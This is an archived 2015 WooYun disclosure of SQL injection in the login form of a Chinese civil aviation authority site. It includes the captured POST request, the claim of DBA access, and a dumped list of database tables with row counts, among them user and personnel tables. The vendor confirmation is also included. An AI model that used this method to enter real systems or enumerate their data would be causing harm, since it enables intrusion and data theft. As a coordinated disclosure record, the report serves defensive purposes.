当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0139566

漏洞标题:中国民航局某站SQL注入漏洞

相关厂商:中国民航局

漏洞作者: Xmyth_夏洛克

提交时间:2015-09-09 18:49

修复时间:2015-10-26 14:36

公开时间:2015-10-26 14:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-09: 细节已通知厂商并且等待厂商处理中
2015-09-11: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-21: 细节向核心白帽子及相关领域专家公开
2015-10-01: 细节向普通白帽子公开
2015-10-11: 细节向实习白帽子公开
2015-10-26: 细节向公众公开

简要描述:

2333333

详细说明:

存在注入URL:
http://**.**.**.**/Portal/RfSoft.MapleTr.DPS/Hr/Html/Login.htm?autologin=false

登陆页面.png


用户名存在注入,报错信息可看出

保错.png


漏洞证明:

抓post包

POST /Portal/RfSoft.MapleTr.DPS/Hr/Control/LoginHandler.ashx?opType=LOGIN HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/Portal/RfSoft.MapleTr.DPS/Hr/Html/Login.htm?autologin=false
Content-Length: 64
Cookie: msid=w2lfnpcfzlipsk2ojbnflqpg
X-Forwarded-For: **.**.**.**
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
<Login><UserName>123</UserName><Password>1234</Password></Login>


UserName参数存在注入,DBA权限

dba.png


涉及24个库

24库.png


数据量不小

Database: CMSIS
+------------------------------+---------+
| Table | Entries |
+------------------------------+---------+
| TEMP_AET2013110600008 | 669097 |
| TEMP_AET2013110700024 | 642707 |
| TEMP_AET2013110700033 | 495932 |
| MH_RENYUAN_INFO | 32597 |
| TEMP_AET2013110700015 | 16189 |
| DPS_LOG | 15780 |
| TEMP_AET2013110600002 | 10566 |
| TEMP_AET2013110600005 | 6906 |
| FILEINFO | 6327 |
| TEMP_AET2013110600011 | 4981 |
| TEMP_AET2013110700038 | 4952 |
| TEMP_AET2013111800003 | 2272 |
| TEMP_AET2013110700018 | 2231 |
| TEMP_AET2013110600006 | 1976 |
| DPS_SE_ROLE_USER | 1804 |
| TEMP_AET2013110600010 | 1706 |
| ETL_DATA_LOG | 1403 |
| ETL_DATAFILE_INFO | 1403 |
| TEMP_AET2013110600010A | 1122 |
| DPS_USER | 934 |
| DPS_USER_ORG | 902 |
| TEMP_AET2013110700036 | 835 |
| MH_MRO_INFO | 805 |
| MH_DATA_STATE | 696 |
| TEMP_AET2013110700027 | 647 |
| TEMP_AET2013110600004 | 495 |
| TEMP_AET2013110700021 | 486 |
| ETL_TABLE_COLUMN | 428 |
| TEMP_AET2013110600009 | 392 |
| DMD_MODELMEMBERS | 371 |
| DMD_MODELMEMBERS_HISVERSION | 317 |
| TEMP_AET2013110400002 | 284 |
| TEMP_AET2013110400003 | 274 |
| MH_JIANCHAYUAN_INFO | 241 |
| OMD_OBJECTMANAGE_PROPERTRY | 237 |
| TEMP_AET2013110700041 | 207 |
| TEMP_AET2013111800006 | 196 |
| C_DATADICTIONARY | 182 |
| DPS_MENU | 170 |
| TEMP_ET2013110100003 | 164 |
| TEMP_AET2013110400004 | 150 |
| DPS_SE_AUTHORIZE | 149 |
| TEMP_AET2013110700030 | 142 |
| TEMP_AET2013110600007 | 126 |
| TEMP_AET2013110600003 | 114 |
| MH_AIRLINE_INFO | 109 |
| S_AUTOCODE | 86 |
| TEMP_AET2013110700009 | 83 |
| C_TREEBASE_LEVELICON | 53 |
| ETL_CLASS | 50 |
| C_TABBASE_PARAM | 48 |
| LS_INDIVIDUATION_INFO | 47 |
| BS_BUSINESS_RESOURCE | 40 |
| DMD_SYSCONFIG | 40 |
| C_TREEBASE | 39 |
| MH_TIANBIAO_INFO | 36 |
| LS_SYSINFO | 34 |
| ETL_TABLE_DATA_RELATION | 31 |
| TEMP_AET2013110700012 | 31 |
| ETL_SUB_CLASS | 30 |
| OMD_OBJECTMANAGE_VIEW | 27 |
| OMD_OBJECTMANAGEVIEW_GROUP | 27 |
| PUBLISH_INFORM_DEPARTMENT | 23 |
| DMD_SYSCONFIG_HISTORYVERSION | 22 |
| LDM_SYS_OPTIONS | 22 |
| WF_WORKFLOW_FUNCTION | 21 |
| LDM_SYS_MSG | 19 |
| DPS_PART_VIEW | 16 |
| OMD_OBJECT_V_R_FUN | 14 |
| TREE_HELP_USE | 12 |
| BS_RESOURCE | 11 |
| MH_FENZHIJIGOU_INFO | 10 |
| DPS_SE_ROLE | 8 |
| LINKAGEFORVILLAGE | 8 |
| DPS_LOG_TYPE | 7 |
| DPS_PART_TEMPLATE | 7 |
| BC_FORMAT | 6 |
| MH_DOCUMENTFILE | 6 |
| DPS_ORGANIZATION | 5 |
| PULISH_INFORM | 5 |
| LDM_EXCEL_TOOLS | 4 |
| LINKAGEFORCITY | 4 |
| BC_CONNECTION | 3 |
| C_TABBASE | 3 |
| DPS_LOG_FLAGTYPE | 3 |
| DPS_MESSAGESTATE_TYPE | 3 |
| BC_CONFIG | 2 |
| DC_BASEINFO | 2 |
| DC_DIR_ELEMENT_RELATION | 2 |
| DPS_PART_PAGE | 2 |
| LINKAGEFORPROVINCE | 2 |
| BC_INSTANCE | 1 |
| CONTROL_FUNCTION | 1 |
| DC_ROOT_DIR | 1 |
| DPS_COMMON_MODULEMENU | 1 |
| DPS_SITE | 1 |
| XF_CODE_COMPANY | 1 |
+------------------------------+---------+


修复方案:

过滤

版权声明:转载请注明来源 Xmyth_夏洛克@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-11 14:35

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向民航行业测评中心通报,由其后续协调网站管理单位处置。同时同步上报给国家上级信息安全协调机构。

最新状态:

暂无